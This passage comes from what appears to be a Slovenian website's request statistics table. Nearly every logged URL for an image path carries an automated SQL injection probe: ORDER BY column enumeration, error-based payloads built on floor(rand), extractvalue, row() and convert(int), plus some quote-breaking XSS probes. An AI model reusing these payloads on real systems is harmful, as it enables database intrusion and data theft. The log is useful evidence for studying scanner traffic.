1699. | 1 | prepovedano.gif //slike//stran_5)) ORDER BY 3674-- gVON/prepovedano.gif |
1700. | 1 | prepovedano.gif //slike//stran_5 ORDER BY 1-- KxrA/prepovedano.gif |
1701. | 1 | prepovedano.gif //slike//stran_5 ORDER BY 2400-- lXBn/prepovedano.gif |
1702. | 1 | prepovedano.gif //slike//stran_5 ORDER BY 1-- nMOW/prepovedano.gif |
1703. | 1 | prepovedano.gif //slike//stran_5 ORDER BY 3563-- nzxh/prepovedano.gif |
1704. | 1 | prepovedano.gif //slike//stran_5') ORDER BY 1-- hCKq/prepovedano.gif |
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1706. | 1 | prepovedano.gif //slike//stran_5')) ORDER BY 1-- LYUB/prepovedano.gif |
1707. | 1 | prepovedano.gif //slike//stran_5')) ORDER BY 2018-- zWqQ/prepovedano.gif |
1708. | 1 | prepovedano.gif //slike//stran_5' ORDER BY 1-- RPoc/prepovedano.gif |
1709. | 1 | prepovedano.gif //slike//stran_5' ORDER BY 5790-- OauI/prepovedano.gif |
1710. | 1 | prepovedano.gif //slike//stran_5') ORDER BY 1-- HTFd/prepovedano.gif |
1711. | 1 | prepovedano.gif //slike//stran_5') ORDER BY 3729-- cRmC/prepovedano.gif |
1712. | 1 | prepovedano.gif //slike//stran_5%' ORDER BY 1-- TdGL/prepovedano.gif |
1713. | 1 | prepovedano.gif //slike//stran_5%' ORDER BY 2888-- CBks/prepovedano.gif |
1714. | 1 | prepovedano.gif //slike//stran_5' ORDER BY 1-- TaBC/prepovedano.gif |
1715. | 1 | prepovedano.gif //slike//stran_5' ORDER BY 6708-- hQUH/prepovedano.gif |
1716. | 1 | prepovedano.gif //slike//stran_5") ORDER BY 1-- RZWq/prepovedano.gif |
1717. | 1 | prepovedano.gif //slike//stran_5") ORDER BY 3425-- zQmV/prepovedano.gif |
1718. | 1 | prepovedano.gif //slike//stran_5" ORDER BY 1-- vjYR/prepovedano.gif |
1719. | 1 | prepovedano.gif //slike//stran_5" ORDER BY 8056-- pkya/prepovedano.gif |
1720. | 1 | prepovedano.gif //slike//stran_5) ORDER BY 1#/prepovedano.gif |
1721. | 1 | prepovedano.gif //slike//stran_5) ORDER BY 6089#/prepovedano.gif |
1722. | 1 | prepovedano.gif //slike//stran_5)) ORDER BY 1#/prepovedano.gif |
1723. | 1 | prepovedano.gif //slike//stran_5)) ORDER BY 7351#/prepovedano.gif |
1724. | 1 | prepovedano.gif //slike//stran_5 ORDER BY 1893#/prepovedano.gif |
1725. | 1 | prepovedano.gif //slike//stran_5 ORDER BY 2402#/prepovedano.gif |
1726. | 1 | prepovedano.gif //slike//stran_5') ORDER BY 7362#/prepovedano.gif |
1727. | 1 | prepovedano.gif //slike//stran_5')) ORDER BY 1#/prepovedano.gif |
1728. | 1 | prepovedano.gif //slike//stran_5')) ORDER BY 3690#/prepovedano.gif |
1729. | 1 | prepovedano.gif //slike//stran_5' ORDER BY 9206#/prepovedano.gif |
1730. | 1 | prepovedano.gif //slike//stran_5') ORDER BY 2747#/prepovedano.gif |
1731. | 1 | prepovedano.gif //slike//stran_5%' ORDER BY 1#/prepovedano.gif |
1732. | 1 | prepovedano.gif //slike//stran_5%' ORDER BY 6980#/prepovedano.gif |
1733. | 1 | prepovedano.gif //slike//stran_5' ORDER BY 6462#/prepovedano.gif |
1734. | 1 | prepovedano.gif //slike//stran_5") ORDER BY 1#/prepovedano.gif |
1735. | 1 | prepovedano.gif //slike//stran_5") ORDER BY 4432#/prepovedano.gif |
1736. | 1 | prepovedano.gif //slike//stran_5" ORDER BY 1#/prepovedano.gif |
1737. | 1 | prepovedano.gif //slike//stran_5" ORDER BY 2158#/prepovedano.gif |
1738. | 1 | prepovedano.gif)(..)'"()( //slike//stran_5/prepovedano.gif)(..)'"()( |
1739. | 1 | nfdega','','scrollbars=1,resizable=1');">prepovedano.gif'tshzbf<'">nfdega //slike//stran_5/prepovedano.gif'tshzbf<'">nfdega |
1740. | 1 | prepovedano.gif) and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (7664=7664 //slike//stran_5/prepovedano.gif) and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (7664=7664 |
1741. | 1 | prepovedano.gif)) and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((3653=3653 //slike//stran_5/prepovedano.gif)) and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((3653=3653 |
1742. | 1 | prepovedano.gif and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_5/prepovedano.gif and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
1743. | 1 | prepovedano.gif') and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('kgzp'='kgzp //slike//stran_5/prepovedano.gif') and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('kgzp'='kgzp |
1744. | 1 | prepovedano.gif')) and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('uhfs'='uhfs //slike//stran_5/prepovedano.gif')) and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('uhfs'='uhfs |
1745. | 1 | prepovedano.gif' and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'yhdb'='yhdb //slike//stran_5/prepovedano.gif' and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'yhdb'='yhdb |
1746. | 1 | prepovedano.gif') and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('nnpo' like 'nnpo //slike//stran_5/prepovedano.gif') and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('nnpo' like 'nnpo |
1747. | 1 | prepovedano.gif%' and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'eztd%'='eztd //slike//stran_5/prepovedano.gif%' and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'eztd%'='eztd |
1748. | 1 | prepovedano.gif' and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'vejc' like 'vejc //slike//stran_5/prepovedano.gif' and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'vejc' like 'vejc |
1749. | 1 | prepovedano.gif") and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("ktzt"="ktzt //slike//stran_5/prepovedano.gif") and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("ktzt"="ktzt |
1750. | 1 | prepovedano.gif" and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "cgua"="cgua //slike//stran_5/prepovedano.gif" and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "cgua"="cgua |
1751. | 1 | prepovedano.gif and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- dwzl //slike//stran_5/prepovedano.gif and (select 9557 from(select count(*),concat(0x71766a7671,(select (elt(9557=9557,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- dwzl |
1752. | 1 | prepovedano.gif) and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and (9435=9435 //slike//stran_5/prepovedano.gif) and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and (9435=9435 |
1753. | 1 | prepovedano.gif)) and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ((9934=9934 //slike//stran_5/prepovedano.gif)) and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ((9934=9934 |
1754. | 1 | prepovedano.gif and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) //slike//stran_5/prepovedano.gif and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) |
1755. | 1 | prepovedano.gif') and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ('mrjr'='mrjr //slike//stran_5/prepovedano.gif') and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ('mrjr'='mrjr |
1756. | 1 | prepovedano.gif')) and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and (('cnle'='cnle //slike//stran_5/prepovedano.gif')) and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and (('cnle'='cnle |
1757. | 1 | prepovedano.gif' and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and 'iofp'='iofp //slike//stran_5/prepovedano.gif' and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and 'iofp'='iofp |
1758. | 1 | prepovedano.gif') and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ('gymd' like 'gymd //slike//stran_5/prepovedano.gif') and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ('gymd' like 'gymd |
1759. | 1 | prepovedano.gif%' and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and 'jnki%'='jnki //slike//stran_5/prepovedano.gif%' and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and 'jnki%'='jnki |
1760. | 1 | prepovedano.gif' and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and 'asko' like 'asko //slike//stran_5/prepovedano.gif' and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and 'asko' like 'asko |
1761. | 1 | prepovedano.gif") and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ("ikck"="ikck //slike//stran_5/prepovedano.gif") and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and ("ikck"="ikck |
1762. | 1 | prepovedano.gif" and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and "exsf"="exsf //slike//stran_5/prepovedano.gif" and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071)) and "exsf"="exsf |
1763. | 1 | prepovedano.gif and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071))-- kdzp //slike//stran_5/prepovedano.gif and extractvalue(2145,concat(0x5c,0x71766a7671,(select (elt(2145=2145,1))),0x71626b7071))-- kdzp |
1764. | 1 | prepovedano.gif) and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and (7891=7891 //slike//stran_5/prepovedano.gif) and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and (7891=7891 |
1765. | 1 | prepovedano.gif)) and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ((1426=1426 //slike//stran_5/prepovedano.gif)) and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ((1426=1426 |
1766. | 1 | prepovedano.gif and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) //slike//stran_5/prepovedano.gif and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) |
1767. | 1 | prepovedano.gif') and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ('tpdp'='tpdp //slike//stran_5/prepovedano.gif') and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ('tpdp'='tpdp |
1768. | 1 | prepovedano.gif')) and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and (('iyfu'='iyfu //slike//stran_5/prepovedano.gif')) and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and (('iyfu'='iyfu |
1769. | 1 | prepovedano.gif' and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and 'vyfm'='vyfm //slike//stran_5/prepovedano.gif' and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and 'vyfm'='vyfm |
1770. | 1 | prepovedano.gif') and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ('lrja' like 'lrja //slike//stran_5/prepovedano.gif') and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ('lrja' like 'lrja |
1771. | 1 | prepovedano.gif%' and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and 'qbts%'='qbts //slike//stran_5/prepovedano.gif%' and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and 'qbts%'='qbts |
1772. | 1 | prepovedano.gif' and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and 'ammb' like 'ammb //slike//stran_5/prepovedano.gif' and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and 'ammb' like 'ammb |
1773. | 1 | (select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ("rxpp"="rxpp','','scrollbars=1,resizable=1');">prepovedano.gif") and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ("rxpp"="rxpp //slike//stran_5/prepovedano.gif") and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and ("rxpp"="rxpp |
1774. | 1 | (select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and "kolz"="kolz','','scrollbars=1,resizable=1');">prepovedano.gif" and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and "kolz"="kolz //slike//stran_5/prepovedano.gif" and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x) and "kolz"="kolz |
1775. | 1 | prepovedano.gif and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x)-- quvc //slike//stran_5/prepovedano.gif and row(5643,8085)>(select count(*),concat(0x71766a7671,(select (elt(5643=5643,1))),0x71626b7071,floor(rand(0)*2))x from (select 2994 union select 3796 union select 4472 union select 9032)a group by x)-- quvc |
1776. | 1 | prepovedano.gif) and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (5582=5582 //slike//stran_5/prepovedano.gif) and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (5582=5582 |
1777. | 1 | prepovedano.gif)) and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ((3083=3083 //slike//stran_5/prepovedano.gif)) and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ((3083=3083 |
1778. | 1 | prepovedano.gif and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) //slike//stran_5/prepovedano.gif and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) |
1779. | 1 | prepovedano.gif') and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('glad'='glad //slike//stran_5/prepovedano.gif') and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('glad'='glad |
1780. | 1 | prepovedano.gif')) and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (('wqqu'='wqqu //slike//stran_5/prepovedano.gif')) and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (('wqqu'='wqqu |
1781. | 1 | prepovedano.gif' and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'dufn'='dufn //slike//stran_5/prepovedano.gif' and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'dufn'='dufn |
1782. | 1 | prepovedano.gif') and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('ffxh' like 'ffxh //slike//stran_5/prepovedano.gif') and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('ffxh' like 'ffxh |
1783. | 1 | prepovedano.gif%' and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'mnuh%'='mnuh //slike//stran_5/prepovedano.gif%' and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'mnuh%'='mnuh |
1784. | 1 | prepovedano.gif' and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'puhk' like 'puhk //slike//stran_5/prepovedano.gif' and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'puhk' like 'puhk |
1785. | 1 | prepovedano.gif") and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ("ixsh"="ixsh //slike//stran_5/prepovedano.gif") and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ("ixsh"="ixsh |
1786. | 1 | prepovedano.gif" and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and "pqks"="pqks //slike//stran_5/prepovedano.gif" and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and "pqks"="pqks |
1787. | 1 | prepovedano.gif and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113)))-- nzoq //slike//stran_5/prepovedano.gif and 5948 in (select (char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (5948=5948) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113)))-- nzoq |
1788. | 1 | prepovedano.gif) and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (6469=6469 //slike//stran_5/prepovedano.gif) and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (6469=6469 |
1789. | 1 | prepovedano.gif)) and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ((5545=5545 //slike//stran_5/prepovedano.gif)) and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ((5545=5545 |
1790. | 1 | prepovedano.gif and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) //slike//stran_5/prepovedano.gif and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) |
1791. | 1 | prepovedano.gif') and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('bnue'='bnue //slike//stran_5/prepovedano.gif') and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('bnue'='bnue |
1792. | 1 | prepovedano.gif')) and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (('ctfs'='ctfs //slike//stran_5/prepovedano.gif')) and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and (('ctfs'='ctfs |
1793. | 1 | prepovedano.gif' and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'ppmq'='ppmq //slike//stran_5/prepovedano.gif' and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'ppmq'='ppmq |
1794. | 1 | prepovedano.gif') and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('bhay' like 'bhay //slike//stran_5/prepovedano.gif') and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ('bhay' like 'bhay |
1795. | 1 | prepovedano.gif%' and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'xrmy%'='xrmy //slike//stran_5/prepovedano.gif%' and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'xrmy%'='xrmy |
1796. | 1 | prepovedano.gif' and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'efzx' like 'efzx //slike//stran_5/prepovedano.gif' and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and 'efzx' like 'efzx |
1797. | 1 | prepovedano.gif") and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ("tqtf"="tqtf //slike//stran_5/prepovedano.gif") and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and ("tqtf"="tqtf |
1798. | 1 | prepovedano.gif" and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and "nkoa"="nkoa //slike//stran_5/prepovedano.gif" and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113))) and "nkoa"="nkoa |
1799. | 1 | prepovedano.gif and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113)))-- ndod //slike//stran_5/prepovedano.gif and 3198=convert(int,(select char(113)+char(118)+char(106)+char(118)+char(113)+(select (case when (3198=3198) then char(49) else char(48) end))+char(113)+char(98)+char(107)+char(112)+char(113)))-- ndod |
